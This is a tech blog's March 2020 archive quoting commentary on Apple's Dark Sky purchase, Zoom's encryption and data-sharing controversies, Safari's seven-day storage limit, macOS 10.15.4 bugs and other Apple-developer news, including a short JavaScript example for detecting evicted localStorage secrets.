Archive for March 2020

Tuesday, March 31, 2020

Apple Buys Dark Sky

Adam Grossman (MacRumors, tweet, Hacker News):

Dark Sky has joined Apple.

[…]

There will be no changes to Dark Sky for iOS at this time. It will continue to be available for purchase in the App Store.

[…]

The [Android] app will no longer be available for download. Service to existing users and subscribers will continue until July 1, 2020, at which point the app will be shut down.

[…]

Our API service for existing customers is not changing today, but we will no longer accept new signups. The API will continue to function through the end of 2021.

Ryan Jones:

Bottom line: Dark Sky is the right purchase for Apple.

They win in one area that matters a lot: rain, now. They have complete coverage. They are built in a modern, improvable way.

Just don’t use it for any future weather forecasts! (>48 hours away)

Update (2020-04-10): John Gruber:

I’m hoping that Apple has acquired Dark Sky not merely to beef up the built-in iPhone Weather app (Apple has no first-party Weather app for iPad or Mac, curiously), but to add hyperlocal weather forecasting APIs to its OSes. This would add a competitive advantage for iOS and MacOS both in terms of weather and privacy. Third-party weather apps are notorious for abusing location privileges.

Nate Gorby:

CARROT Weather’s forecast for today

Update (2021-06-13): David Smith:

Looks like Dark Sky will keep their API active for a year longer than that originally announced.

Nick Heer:

There is a WeatherKit private framework lurking in iOS 15 that does not exist in iOS 14. It currently only contains strings of different weather conditions, but perhaps it will be more substantial and not private in the future.

Zoom Meetings Aren’t End-to-End Encrypted

Micah Lee and Yael Grauer (Hacker News):

Zoom, the video conferencing service whose use has spiked amid the Covid-19 pandemic, claims to implement end-to-end encryption, widely understood as the most private form of internet communication, protecting conversations from all outside parties. In fact, Zoom is using its own definition of the term, one that lets Zoom itself access unencrypted video and audio from meetings.

[…]

Matthew Green, a cryptographer and computer science professor at Johns Hopkins University, points out that group video conferencing is difficult to encrypt end to end. That’s because the service provider needs to detect who is talking to act like a switchboard, which allows it to only send a high-resolution videostream from the person who is talking at the moment, or who a user selects to the rest of the group, and to send low-resolution videostreams of other participants. This type of optimization is much easier if the service provider can see everything because it’s unencrypted.

“If it’s all end-to-end encrypted, you need to add some extra mechanisms to make sure you can do that kind of ‘who’s talking’ switch, and you can do it in a way that doesn’t leak a lot of information. You have to push that logic out to the endpoints,” he told The Intercept. This isn’t impossible, though, Green said, as demonstrated by Apple’s FaceTime, which allows group video conferencing that’s end-to-end encrypted. “It’s doable. It’s just not easy.”

See also: Dan Moren, John Gruber.

Update (2020-04-10): Nick Heer:

Lacking end-to-end encryption for video chat is not uncommon. What is unique to Zoom is that they’re lying about it in marketing materials by redefining “end-to-end encryption” to fit their needs.

Matthew Green (Hacker News):

Unfortunately, Citizenlab just put out a few of their own results which are based on reverse-engineering the Zoom software. These raise further concerns that Zoom isn’t being 100% clear about how much end-to-end security their service really offers.

This situation leaves Zoom users with a bit of a conundrum: now that everyone in the world is relying on this software for so many critical purposes, should we trust it? In this mostly non-technical post I’m going to talk about what we know, what we don’t know, and why it matters.

See also: MacRumors, Hacker News.

Oded Gal (Hacker News):

In light of recent interest in our encryption practices, we want to start by apologizing for the confusion we have caused by incorrectly suggesting that Zoom meetings were capable of using end-to-end encryption. Zoom has always strived to use encryption to protect content in as many scenarios as possible, and in that spirit, we used the term end-to-end encryption. While we never intended to deceive any of our customers, we recognize that there is a discrepancy between the commonly accepted definition of end-to-end encryption and how we were using it.

[…]

To be clear, in a meeting where all of the participants are using Zoom clients, and the meeting is not being recorded, we encrypt all video, audio, screen sharing, and chat content at the sending client, and do not decrypt it at any point before it reaches the receiving clients.

That’s not what end-to-end encryption means.

Update (2020-11-27): Zack Whittaker (tweet, Hacker News):

The Federal Trade Commission has announced a settlement with Zoom, after it accused the video calling giant of engaging in “a series of deceptive and unfair practices that undermined the security of its users,” in part by claiming the encryption was stronger than it actually was.

See also: Jon Brodkin.

Omni Group Layoffs

Brent Simmons (tweet):

Omni’s been around for almost 30 years, and I hope it’s around for another 30. It’s one of the great Mac and iOS shops — they will sing songs about Omni, at maximum volume, in the great halls.

But businesses go up and down, and Omni’s had a bit of a down period. Normally that would be fine, but the current economic circumstances turn “a bit of a down period” into something more serious — and, in order to get things going the right way again, the company had to lay off some people. Including me.

For anyone who’s able to hire now, this is a rare opportunity to scoop up some top talent that’s usually off the market.

Mark Boszko (tweet):

People probably know me best for my video production work — please see the output of my last seven years in The Omni Group’s video archives — but I have also done a lot of related development work, and would love to push my career in that direction.

Joel Page:

In short, I designed applications for macOS and iOS. If you look at any of Omni’s applications, you’re looking at my work. Icons, UX, UI, but mostly the icons. I joke that being a UI designer is 95% being a production artist, and that holds pretty true.

All sorts of businesses are affected. Marcin Krzyzanowski was recently laid off from his startup:

I’m looking for new opportunity (yay!) I’ve been doing remote (EU and US) for many years. I’m seasoned iOS Developer, some Mac dev (I’m open to other tech). Interested in contract and/or fulltime.

John Sundell is helping indie developers, many of whom are seeing lower sales:

Normally, this site (and all of my other work) is funded by sponsorships — through non-tracking, privacy-focused (and JavaScript-free) ads that I run on a weekly basis. But for the next two weeks there will be no ads on this site. Instead, each day, I’ll promote a new indie app whose developer has been financially impacted by the current pandemic. For free, with no strings attached.

I hope that, with your support, these indie developers will regain some of that lost revenue through this effort, and that we will all get to discover a few great new apps as well.

[…]

Also, I’d love to see you share your own favorite indie apps on Twitter and other social networks — and if you do, feel free to use the hashtag #IndieSupportWeeks to make those tweets and posts easier to find for everyone who’s following this effort.

Update (2020-04-08): See also: Hacker News.

John Gruber (tweet):

All of this — as Brent says, gestures at everything — aside, it is hard to shake the feeling that the market for independent professional software is coming apart at the seams, fraying irreparably.

Paying for good software is in our own best interest.

Frank Reiff:

OMG. OmniGroup, the IBM of Apple indie development, has laid off a whole bunch of people. If that’s not an indictment of where indies are at, I don’t know what is. Still Apple is getting 30% of all sales and is about to increase busy work for everybody at WWDC again.

Kristina Sontag:

That said, if you need great people in test, design, marketing, support, and engineering let me know and I can connect you!

James Rowland:

Like others, I was laid off from the Omni Group. If you need a PM who knows privacy law and copyright or a Tester who can navigate iOS and Mac app review, give me a shout.

macOS 10.15.4 Broke SSH

Tyler Hall (tweet, Hacker News):

The user in the Apple forums was right. At least in my case, my one server that happened to be running on a non-standard ssh port above 8192 will not connect from Catalina 10.15.4 when using the hostname instead of the IP address.

He’s not the only one:

/usr/bin/ssh in macOS 10.15.4 hangs if used with the -p flag to specify an alternate port and used with a hostname. This was not present in macOS 10.15.3.

[…]

Using maximum verbosity doesn’t give any clues, and max debugging on the sshd target host shows no connection is ever initiated[…]

vgene:

I had the same problem on a MacBook after upgrading to 10.15.4. However, I wasn’t using a port number higher than 8192, the socket was 75 with a hostname. The problem was solved when I replaced the hostname with its IP or plugged in an Ethernet Cable. I tried to restart mDNSResponder and flush the dns cache and switch to a different DNS server. Nothing works so far.

The Internet Archive’s National Emergency Library

The Internet Archive (Hacker News):

On March 17, the American Library Association Executive Board took the extraordinary step to recommend that the nation’s libraries close in response to the COVID-19 outbreak. In doing so, for the first time in history, the entirety of the nation’s print collection housed in libraries is now unavailable, locked away indefinitely behind closed doors.

And so, to meet this unprecedented need at a scale never before seen, we suspended waitlists on our lending collection. As we anticipated, critics including the Authors Guild and the Association of American Publishers have released statements (here and here) condemning the National Emergency Library and the Internet Archive. Both statements contain falsehoods that are being spread widely online. To counter the misinformation, we are addressing the most egregious points here and have also updated our FAQs.

I don’t see anything about the legal basis for suspending waitlists, i.e. allowing unlimited simultaneous checkouts. I suspect there is none.

On the one hand, with libraries closed, there are lots of library copies that should be in circulation but aren’t. Internet Archive is solving a real problem. On the other hand, what’s the principle here? Can any site claim to be acting on behalf of libraries, distribute whatever content they want, and force the copyright holders to opt out rather than opt in?

Update (2020-06-02): TorrentFreak:

Today, major publishers Hachette Book Group, Inc., HarperCollins Publishers LLC, John Wiley & Sons, Inc., and Penguin Random House LLC went to war with the project by filing a copyright infringement lawsuit against the Internet Archive and five ‘Doe’ defendants in a New York court.

[…]

Claiming that IA is hiding behind “an invented theory” simply labeled Controlled Digital Lending, the publishers maintain there is nothing in copyright law that allows anyone to systematically copy and distribute digital book files simply because they claim to own an original physical copy.

Furthermore, IA’s loosening of its own CDL rules at the time of the pandemic only made matters worse, as it came precisely when book market players were also under pressure to survive.

Update (2020-06-11): Brewster Kahle (via Hacker News):

Today we are announcing the National Emergency Library will close on June 16th, rather than June 30th, returning to traditional controlled digital lending. We have learned that the vast majority of people use digitized books on the Internet Archive for a very short time. Even with the closure of the NEL, we will be able to serve most patrons through controlled digital lending, in part because of the good work of the non-profit HathiTrust Digital Library. HathiTrust’s new Emergency Temporary Access Service features a short-term access model that we plan to follow.

We moved up our schedule because, last Monday, four commercial publishers chose to sue Internet Archive during a global pandemic.

Unmasking Twitter

Twitter:

Broadening our definition of harm to address content that goes directly against guidance from authoritative sources of global and local public health information. Rather than reports, we will enforce this in close coordination with trusted partners, including public health authorities and governments, and continue to use and consult with information from those sources when reviewing content. Under this new guidance, we will require people to remove tweets that include[…]

[…]

Description of harmful treatments or protection measures which are known to be ineffective, do not apply to COVID-19, or are being shared out of context to mislead people, even if made in jest, such as “drinking bleach and ingesting colloidal silver will cure COVID-19.”

This is quite a statement and a difficult situation for Twitter to be in. Obviously, there is a lot of misinformation out there, and they don’t want Twitter to be overrun with it. But some information from health and government sources has turned out to be incorrect, and different authoritative sources don’t always agree with one another. Some potential treatments are approved in certain jurisdictions but banned in others. Knowledge is evolving by the day, but nothing is going to be truly verified scientifically until after this is all over.

Ben Thompson:

Everyone is taking their guidance from the WHO, and that’s a problem. […] It seems likely this paragraph about the lack of asymptomatic transmission was strongly argued for by China.

[…]

And yet, Director General Tedros Adhanom Ghebreyesus argued — on Twitter! — that asymptomatic carriers were not a concern[…]

Again, an increasing amount of evidence is that this just isn’t true: asymptomatic carriers are a major problem.

[…]

It sure seems like multiple health authorities — the experts Twitter is going to rely on — have told us that masks “are known to be ineffective”: is Twitter going to delete the many, many, many tweets — some of which informed this article — arguing the opposite?

The answer, obviously, is that Twitter won’t, because this is another example of where Twitter has been a welcome antidote to “experts”; what is striking, though, is how explicitly this shows that Twitter’s policy is a bad idea, not just because it allows countries like China to indirectly influence its editorial decisions, but also because it limits the search for truth.

Update (2020-04-08): Mike Rockwell:

Unfortunately, this is the path that we have to take. If only because advertisers will demand it — they don’t want to see their brand promoted next to anything they consider to be misleading, incorrect, dangerous, or objectionable. But hopefully we’ll all eventually move away from these platforms, before things get too bad, toward a more open web where each of us share our ideas on our own domains.

Update (2020-04-23): Donie O’Sullivan (via Hacker News):

Facebook says it has removed promotion of anti-quarantine events in California, New Jersey, and Nebraska after consultation with state governments

See also: Slashdot.

Monday, March 30, 2020

Xattrs Make Time Machine Backups Waste Space

Howard Oakley:

When metadata used to change relatively infrequently, this had little in the way of adverse effects. Now that security and privacy protection are doing so much with extended attributes, the unintended consequence is that many of the files which are copied into each Time Machine backup haven’t actually changed in substance, but a quarantine flag has been added, for instance.

It’s easy to demonstrate this in action if you’re making Time Machine backups. Simply create a sizeable PDF file which doesn’t have a quarantine flag attached to it, or strip the flag from a file which already has one. Leave the file alone for the next automatic backup. After that, open the document using Preview, which will in a fraction of a second automatically write a quarantine flag to it. Leave it for the next automatic backup, and that backup will contain a second copy of that PDF which only differs in that quarantine flag, maybe as little as 31 bytes in all. Imagine this happening to many 10 GB movie clips and you see where this is heading.

“Cursor,” “Pointer,” and “Insertion Point”

John Gruber:

For clarity, it’s best not to refer to either of these things as cursors. Instead:

  • Mouse/trackpad pointer.
  • Insertion point.

This terminology has been slightly confusing over the last week, since Apple’s surprise announcement of pointer support in iPadOS 13.4. In their marketing materials, Apple is calling pointers “cursors”.

[…]

In its technical documentation, Apple is clear.

The new API calls it a “pointer,” but Carbon and Cocoa have historically used “cursor.” Of course, “pointer” also has another meaning in code.

Dr. Drang:

For 35 years, Apple’s been telling me this thing should be called a pointer, and I’ve been following along, mainly because I thought the distinction between a pointer and a cursor was useful.

Friday, March 27, 2020

Old macOS Desktop Pictures, Upscaled

Stephen Hackett (via John Gruber):

Every major version of Mac OS X/macOS has come with a new default wallpaper. As you can see, I have collected them all here.

While great in their day, the early wallpapers are now quite small in the world of 5K displays.

Major props to the world-class designer who does all the art of Relay FM, the mysterious @forgottentowel, for upscaling some of these for modern screens.

See also: Joe Groff.

Chris Lattner on Swift, TensorFlow, MLIR, and SiFive

Accidental Tech Podcast (tweet) has a very interesting interview with Chris Lattner, covering a wide range of programming language and compiler topics, as well as the future of WWDC.

Update (2020-04-10): See also: MacRumors.

Amazon Sellers “Hijack” Listings to Sell Face Masks

Louise Matsakis (via Hacker News):

The 148th most popular book on Amazon Wednesday wasn’t actually a book at all: It was a package of 50 disposable face masks—the kind that shoppers have scrambled to buy amid the coronavirus pandemic. Surging demand for masks, as well as supplies like hand sanitizer and disinfectant wipes, has emptied store shelves, and in some cases led to skyrocketing prices on Amazon.

[…]

“Face masks and hand sanitizers are the number one and number two most searched terms on Amazon. That's attracting many sellers who are pulling every trick they can think of to get into search results,” says Juozas Kaziukėnas, founder of the ecommerce data firm Marketplace Pulse, who first alerted WIRED to the face mask listings.

[…]

By the end of February, Amazon announced it had removed 1 million products that were falsely advertised to defend against or cure Covid-19, as well as tens of thousands of items listed for inflated prices.

Thursday, March 26, 2020

Safari 13.1: Third-Party Cookie Blocking and 7-Day Script-Writeable Storage

John Wilander (tweet):

Cookies for cross-site resources are now blocked by default across the board. This is a significant improvement for privacy since it removes any sense of exceptions or “a little bit of cross-site tracking is allowed.”

[…]

Safari continues to pave the way for privacy on the web, this time as the first mainstream browser to fully block third-party cookies by default.

[…]

Now ITP has aligned the remaining script-writable storage forms with the existing client-side cookie restriction, deleting all of a website’s script-writable storage after seven days of Safari use without user interaction on the site.

[…]

That is the case in Safari. Web applications added to the home screen are not part of Safari and thus have their own counter of days of use. Their days of use will match actual use of the web application which resets the timer. We do not expect the first-party in such a web application to have its website data deleted.

The existing cookie restrictions have been really frustrating. There are many sites that I visit monthly, and so I need to enter my username and password every single time. I don’t understand why cookies, of all things, don’t have site-specific settings in Safari. I don’t like cookies in general, but there are some sites that I want to trust. Sometimes I wonder whether I should write a script to auto-open them weekly to keep the cookies warm.

Ole Begemann:

I love the WebKit/Safari teams’ continuing work on limiting third-party cookies and other forms of tracking. I hope they tackle first-party tracking next.

Of the hundreds of websites I visit, I really only want to allow a handful to set cookies, and then perhaps only for a short time.

Safari now has 11 categories of site-specific configuration. It’s strange that cookies/local storage is not one of them.

Aral Balkan:

On the face of it, WebKit’s announcement yesterday titled Full Third-Party Cookie Blocking and More sounds like something I would wholeheartedly welcome. Unfortunately, I can’t because the “and more” bit effectively kills off Offline Web Apps and, with it, the chance to have privacy-respecting apps like the prototype I was exploring earlier in the year based on DAT.

[…]

If I use the app in Safari on iOS without adding it to Home Screen and leave it for seven days, will my shopping list be deleted?

If I do the same thing on Safari for macOS (which doesn’t have a Home Screen), will my shopping list be deleted?

Andre Garzia (via Hacker News):

There is a huge opportunity for the creation of private client-side-only PWAs in the world but developers wanting to build such apps are in for an uphill battle against the status quo and now against Apple as well.

[…]

I want to remind everyone that installing to the home screen is not what makes a PWA, it is an optional step. A PWA is still a PWA if the user accesses it only occasionally by typing the URL into the browser or keeping a bookmark. I access many PWAs on my phone but they are not in my home screen because I like to keep it clean. My browser “new tab” lists them for me, they are still as much a PWA as the ones in your home screen.

Saying that you should build a native app is not an answer. Native apps need to go through gatekeepers, the web does not. The web is the only mass communication media where we all have publishing access (to some degree at least), native iOS apps are not like this. There is a reason Mozilla can’t ship Firefox with Gecko on iOS and the reason is not because they don’t know how to do it. Apple is doing this in the name of privacy but what it actually does is force developers closer to their app store.

Jasper Patterson:

At 1Password we are concerned about the sudden announcement that LocalStorage will expire after 7 days, and want to provide our use case of browser storage and how this will cause harm to our users (including irreversible data loss to some).

We have a full-featured web app at 1Password.com that allows users to sign up for an account, access their vaults, and perform admin functions for their business.

[…]

The Secret Key is a randomly generated string generated locally during signup and stored on devices users have previously used. This key is required for users to decrypt their vaults. Given that most signups occur in a web browser, that is the first place we store this critical piece of data. While we do try to encourage users to install our native applications, for some (unknown) number of users out there LocalStorage in their browser will be the only place they have this key saved, and in 7 days may now become irreversibly locked out of their 1Password vaults.
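
The failure mode Patterson describes, as an added example that is not 1Password’s code: a web app keeps a decryption secret in `localStorage` and needs to tell “this browser was never enrolled” apart from “Safari evicted the secret”, so that it can show a recovery prompt instead of silently asking for a key the user may no longer have. A second sentinel key in the same storage cannot do that, because ITP removes all script-writable storage for the origin at once. The signal used here is an HttpOnly cookie the server set at enrollment: ITP’s seven-day cap applies to client-side cookies and script-writable storage, not to cookies set by the server, so the cookie outlives the `localStorage` entry. The cookie is modeled as a boolean the server reports, the key names are ours, and the timeline is constructed.

```javascript
class MemoryStorage {
  // Stand-in for window.localStorage so the example runs under Node; in a
  // browser pass `window.localStorage` instead.
  constructor() { this.map = new Map(); }
  getItem(k) { return this.map.has(k) ? this.map.get(k) : null; }
  setItem(k, v) { this.map.set(k, String(v)); }
  removeItem(k) { this.map.delete(k); }
  clear() { this.map.clear(); }
}

const SECRET_KEY = 'secretKey';               // hypothetical key names
const LAST_GESTURE = 'secretKey.lastGesture';
const DAY_MS = 24 * 60 * 60 * 1000;

class SecretKeyStore {
  constructor(storage, now = () => Date.now()) { this.storage = storage; this.now = now; }

  // Called after signup. The caller must also hand the secret to the user
  // (print or download), because this copy is ephemeral under ITP.
  enroll(secret) {
    this.storage.setItem(SECRET_KEY, secret);
    this.recordGesture();
  }

  // Wire this to click/keydown handlers: ITP's counter resets on user
  // interaction with the page, not on page loads, so check() must not call it.
  recordGesture() { this.storage.setItem(LAST_GESTURE, String(this.now())); }

  // `serverSawEnrollmentCookie`: did the request carry the HttpOnly cookie the
  // server set at enrollment? Returns one of
  //   { state: 'ok', secret, nudgeBackup }  secret present
  //   { state: 'evicted' }                  cookie present, storage empty: show recovery UI
  //   { state: 'never-enrolled' }           new browser: ask the user for the secret
  check(serverSawEnrollmentCookie) {
    const secret = this.storage.getItem(SECRET_KEY);
    if (secret === null) {
      return { state: serverSawEnrollmentCookie ? 'evicted' : 'never-enrolled' };
    }
    // Safari counts days of *Safari use*, which the page cannot observe.
    // Calendar days since the last gesture is an upper bound on that counter,
    // so nudging from day 6 always fires before eviction can happen (it may
    // fire earlier than strictly necessary).
    const days = (this.now() - Number(this.storage.getItem(LAST_GESTURE) || 0)) / DAY_MS;
    return { state: 'ok', secret, nudgeBackup: days >= 6 };
  }
}

// What Safari does after seven days of use without interaction: every
// script-writable store for the origin is removed at once.
function simulateItpEviction(storage) { storage.clear(); }

function demo() {
  let clock = Date.UTC(2020, 2, 26);            // constructed timeline
  const storage = new MemoryStorage();
  const store = new SecretKeyStore(storage, () => clock);
  store.enroll('CONSTRUCTED-EXAMPLE-SECRET');
  const day0 = store.check(true);
  clock += 8 * DAY_MS;                          // no visits, no gestures
  const day8 = store.check(true);               // still there, but the user should be warned
  simulateItpEviction(storage);
  const afterEviction = store.check(true);      // server still sees its cookie
  const freshBrowser = new SecretKeyStore(new MemoryStorage(), () => clock).check(false);
  return { day0, day8, afterEviction, freshBrowser };
}
```

The design point is the one Patterson’s post implies: script-writable storage must never be the only copy of a key that cannot be recovered, and the app should be able to say so the moment the copy disappears.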

Half of me knows I’ll rarely use and never prefer a PWA on iOS over a native app, so I know that none of this really matters nor will affect me.

The other half of me wants everyone to adhere to the platonic ideal of the web and thinks Apple should stop doing this shit.

1Password:

When you set up the 1Password apps, your Secret Key will be saved in the apps. So if it gets removed from Safari, you’ll still be able to access your account. It’s an important first step, but there’s more you can do to protect your account.

I’ve seen a new bug since updating to Safari 13.1: specifying Finder tags when using File ‣ Save As in Web Archive format doesn’t actually add the tags to the file.

WebKit/Safari announcement to delete local storage after 7 days of non-use is a terrible thing since it doesn’t mention file:// origins nor UX overrides, particularly per-site settings. Apart from big, public issues like password managers, what about internal tools?

Deleting local storage after 7 days without any user control has the possibility to lose valuable user data. It also kills an entire class of applications. Users do actually want web apps that are able to store some data locally, under the user’s control.

Retina MacBook Air Staingate

Joe Rossignol (tweet):

Apple this week acknowledged that MacBook Air models with Retina displays can exhibit anti-reflective coating issues, as indicated in a memo shared with Apple Authorized Service Providers and obtained by MacRumors.

[…]

Apple’s internal service documentation for this issue previously only mentioned MacBook Pro and discontinued 12-inch MacBook models with Retina displays, but the MacBook Air is now mentioned in at least two places. Apple added a Retina display to the MacBook Air in October 2018 and all models of the notebook have featured one since.

This has been going on for even longer than the butterfly keyboards. So far the repair program is only for MacBook Pros.

Marcin Krzyzanowski:

Apple Care just

1. Rejected my claim for broken screen #staingage
2. Rejected my claim for broken keyboard (clean with air instead)
4. Rejected my battery claim

[…]

this is via Reseller (of course). When I was at Apple Store, they were ready to replace the screen, I just couldn’t wait a few days.

this is ridiculous. They advise me to go to the Apple Store instead. The nearest Apple Store is 580km away.

Update (2020-03-27): John Gruber:

I don’t understand how this is still an issue. My beloved 2014 13-inch MacBook Pro is afflicted with this, and I never bothered getting it repaired. Whatever causes this, you’d think Apple would’ve identified the problem after a few years.

Zoom Attention Tracking and Facebook

Wolfgang (Hacker News):

ZOOM monitors the activity on your computer and collects data on the programs running and captures which window you have focus on.

If you manage the calls, you can monitor what programs users on the call are running as well.

EFF (Hacker News):

The host of a Zoom call has the capacity to monitor the activities of attendees while screen-sharing. This functionality is available in Zoom version 4.0 and higher. If attendees of a meeting do not have the Zoom video window in focus during a call where the host is screen-sharing, after 30 seconds the host can see indicators next to each participant’s name indicating that the Zoom window is not active.

[…]

Zoom allows administrators to see detailed views on how, when, and where users are using Zoom, with detailed dashboards in real-time of user activity. Zoom also provides a ranking system of users based on total number of meeting minutes. If a user records any calls via Zoom, administrators can access the contents of that recorded call, including video, audio, transcript, and chat files, as well as access to sharing, analytics, and cloud management privileges.

See also: Nick Heer.

discreditable:

When someone sends you a zoom invite, cancel the download, then click the having problems link to download again. Cancel it again. It will show you a link to join by browser.

Joseph Cox (tweet, Hacker News):

What the company and its privacy policy don’t make clear is that the iOS version of the Zoom app is sending some analytics data to Facebook, even if Zoom users don’t have a Facebook account, according to a Motherboard analysis of the app.

This sort of data transfer is not uncommon, especially for Facebook; plenty of apps use Facebook’s software development kits (SDK) as a means to implement features into their apps more easily, which also has the effect of sending information to Facebook. But Zoom users may not be aware it is happening, nor understand that when they use one product, they may be providing data to another service altogether.

Update (2020-04-10): Joseph Cox:

On Friday video-conferencing software Zoom issued an update to its iOS app which stops it sending certain pieces of data to Facebook.

David Heinemeier Hansson:

Zoom has stopped the data leakage to Facebook. That’s good. But their privacy policy is still a complete trash fire that belittles privacy legislation, and grants themselves the right to do exactly what they were just caught doing.

Eric S. Yuan (Hacker News):

We originally implemented the “Login with Facebook” feature using the Facebook SDK for iOS (Software Development Kit) in order to provide our users with another convenient way to access our platform. However, we were made aware on Wednesday, March 25, 2020, that the Facebook SDK was collecting device information unnecessary for us to provide our services.

Will Strafach:

absolutely wild how companies are comfortable admitting that they have no clue what kinds of code they are including in their apps, and have to be “made aware” of what their own apps are doing.

John Gruber (tweet):

This Facebook data issue is nowhere near as bad as the web server issue. But it betrays Zoom’s institutionally cavalier attitude to privacy. Their privacy policy more or less grants them carte blanche to do whatever the hell they want.

Mistakes happen. Bugs happen. I not only forgive mistakes, I enjoy forgiving mistakes. But Zoom’s callous disregard for privacy does not seem to be a mistake. As Zoom itself said about the hidden web server they secretly installed on Macs, it’s a feature not a bug.

Joseph Cox:

On Monday a user of the popular video-conferencing software Zoom filed a class action lawsuit against the company for sending data to Facebook. The lawsuit argues that Zoom violated California's new data protection law by not obtaining proper consent from users about the transfer of the data.

Wednesday, March 25, 2020

Little Snitch and the Deprecation of Kernel Extensions

Rich Trouton:

As part of macOS Catalina 10.15.4, Apple has begun displaying a new dialog window message concerning third-party kernel extensions.

[…]

To further reinforce the message that kernel extensions are going away, Apple refers to them in the message window as “legacy system extensions”.

[…]

For a number of managed environments, these messages can be prevented from appearing. As long as a third-party kernel extension is whitelisted using an appropriate configuration profile, the message for it should not appear.

Norbert Heger (Hacker News):

We expect the deprecation to become effective with the next major release of macOS. There’s no official release date from Apple, but based on the release schedule of recent years it will not be before this fall. Little Snitch 4 will then not be loaded by the operating system, but there will still be an option to allow the loading.

[…]

The replacement APIs that are currently available (NetworkExtension framework on macOS 10.15.4) are not yet completely sufficient to implement the full functionality of Little Snitch. But we are working closely with Apple to fill the remaining gaps and we expect that a beta of the next major macOS version (most likely available at the next WWDC) or even an upcoming version of 10.15 will provide what is missing. As soon as the APIs allow us, we will complete the transition of Little Snitch to the new NetworkExtension API. It’s our goal to provide a public beta in June 2020 and a stable version in October.

Previously:

Update (2020-03-27): Greg Hurrell:

I sure hope this doesn’t end up breaking Karabiner-Elements. If I had to use a machine without it, it would seriously impact usability for me. When the day comes that Apple breaks kernel extensions once and for all, I’ll be holding off on OS updates for as long as I can.

Adam Engst:

Unfortunately, since the dialogs give only the developers’ names, not the names of their apps, it’s difficult to know who I might contact. A Google search revealed that Ludovic Leger is the dev lead on TripMode, a useful utility I recommend for managing bandwidth use while away from high-speed networks; see “TripMode Prevents Unwanted Internet Data Usage on a Tethered Mac” (22 July 2015). I’m still not sure who Steven Yan is, or what app of his I might be using. That’s not a problem now, but it might be in a few months once the beta of whatever macOS version follows Catalina comes out.

Update (2020-06-05): Takayama Fumihiko:

Current status of Karabiner-Elements: I’m working on both a DriverKit virtual keyboard and a pure software keyboard using IOHIDSystem.

The IOHIDSystem library, which was used in the old Karabiner-Elements, has been re-implemented.

Update (2021-07-26): Patrick Wardle:

🙋‍♂️Who’s frustrated by Apple deprecating APIs only to provide a broken replacement!?

Several years ago NKEs were deprecated.

This forced devs to rewrite their tools to use Apple’s new (buggy) Network Extensions ...and since then deal w/ a deluge of user-submitted bug reports😭

Xcode 11.4 and Swift 5.2

Xcode 11.4 is now available for download (release notes). Alas, it requires Catalina.

Ted Kremenek:

Swift 5.2 is now officially released! 🎉

[…]

We have drastically improved the quality and precision of error messages in the Swift compiler.

[…]

The compiler leaves “breadcrumbs” when it encounters failures while inferring types in an expression, recording every specific failure along the way. These breadcrumbs allow the compiler to produce precise diagnostics, often with actionable fixes, that lead the developer toward correct code. Below are a few examples of improved error messages.

[…]

In Swift 5.2, the internal representation of declarations in the compiler is immutable, and the code generation phase of the compiler is able to trigger lazy evaluation of requests, the result of which are cached. Since requests are more fine-grained than the old validation step, this improves performance by avoiding wasted work. It also improves correctness, fixing a significant number of correctness issues where the type checker did not anticipate needing to validate something that was later required for code generation.

Code completion is also improved.

Esther Hare (Mac Rumors):

Universal purchase for Mac apps now available.

Previously:

Update (2020-03-27): See also: SDK API Differences.

Update (2020-05-22): Craig Hockenberry:

Here’s a thing I never thought would happen: I need to stay on Mojave on my main development machine, and the current version of Xcode won’t run there, so I’ve stopped updating my iPhone so I can continue to install and debug.

Good job, folks.

A Different Zoom in the Mac App Store

Jeff Johnson:

Remember when people bought the wrong Zoom stock because ZOOM is Zoom Technologies, whereas ZM is Zoom Video Communications? Well they’re at it again, this time on the Mac App Store instead of the stock market. “Zoom is an [sic] screen magnifier” […]

[…]

The fact that mistakenly purchased abandonware is among the top paid apps is an indictment of the Mac App Store. Why isn’t the “real” Zoom on the Mac App Store? I don’t have any insider information, but as a Mac developer I can make an educated guess: Mac App Store policies. Specifically, Mac App Store policies that restrict API usage, especially the sandboxing requirement.

Previously:

Update (2020-04-10): Jeff Johnson:

The misidentified, mistakenly purchased Zoom app is now #1 top paid.

Update (2020-04-15): Jeff Johnson:

The mistakenly purchased “Zoom” Mac app, which hasn’t been updated in 4 years, did nonetheless raise its price in the past week.

Too Hard to Delay Daylight Saving Time

Times of Israel:

Israel could delay switching to daylight saving time to discourage public traffic in the streets in the evening hours and promote social distancing, as part of the fight against the coronavirus, Interior Minister Aryeh Deri said Sunday.

Currently, clocks are planned to spring forward later this week, on the night between March 26 and March 27.

Via Dave DeLong:

Oh, and we’ve got 5 days to change and distribute the timezone databases 😉

Hana Levi Julian:

The government decided this week against going ahead with the change from winter time to summer time, mainly because there were too many complications involved in dealing with the digital presets of the servers and other computers and equipment that were already set up for the change to a summer clock to take place overnight between this coming Thursday and Friday.

Tuesday, March 24, 2020

macOS 10.15.4

Apple (combo update):

macOS Catalina 10.15.4 introduces iCloud Drive folder sharing, Screen Time communication limits, Apple Music time-synced lyrics view, and more. The update also improves the stability, reliability, and security of your Mac.

There’s no mention of Mail fixes, and I already have multiple reports that the bug where messages disappear when dragged to another mailbox is still present. Another customer said that the update did fix the bug he was seeing where rules copied messages instead of moving them.

Previously:

Update (2020-03-27): See also: Howard Oakley, MacRumors.

Joachim Fornallaz:

A great update of macOS with changes to Photos improving library upgrades, exports, printing, and iCloud downloads.

Tanner Bennett:

macOS update notifications are so user-hostile nowadays. No way to dismiss without agreeing to another notification within the next 24 hours, and really no way to turn them off at all either.

I have update checking turned off but I got a notification just now.

Adam Engst (forum):

To share an iCloud Drive folder in 10.15.4, Control-click it in the Finder and choose Share > Add People. macOS’s odd modal dialog appears, letting you set who can access the folder (invitees or anyone with the link) and what permissions they have (view only or make changes). Select a sharing mechanism at the top and enter the name of the person with whom you want to share, click Share, and you’re done.

Gus Mueller (tweet):

This is a quick developer PSA. MacOS 10.15.4 was just released, and there was a minor change in the way NSAttributedString’s -initWithHTML:options:documentAttributes method works. Previously (10.15.3 and earlier) if you passed an HTML snippet using HelveticaNeue with a size of 20, the minimum line height for the attributed string was set to 25 (and if you passed 40 for the font size, you’d get 49). With 10.15.4 the minimum line height is now set to 0. I’m actually in favor of this change, but if you were expecting certain layouts to happen based on the previous defaults, things might look different for you.

Howard Oakley:

A few users are reporting that, following upgrading their Mac to Catalina 10.15.4, one or more of its USB-C/Thunderbolt 3 ports stops working.

Although uncommon, if your Mac suffers this the remedy is straightforward: reset its SMC.

Aerial Brings Apple TV Screen Savers to the Mac

Josh Centers:

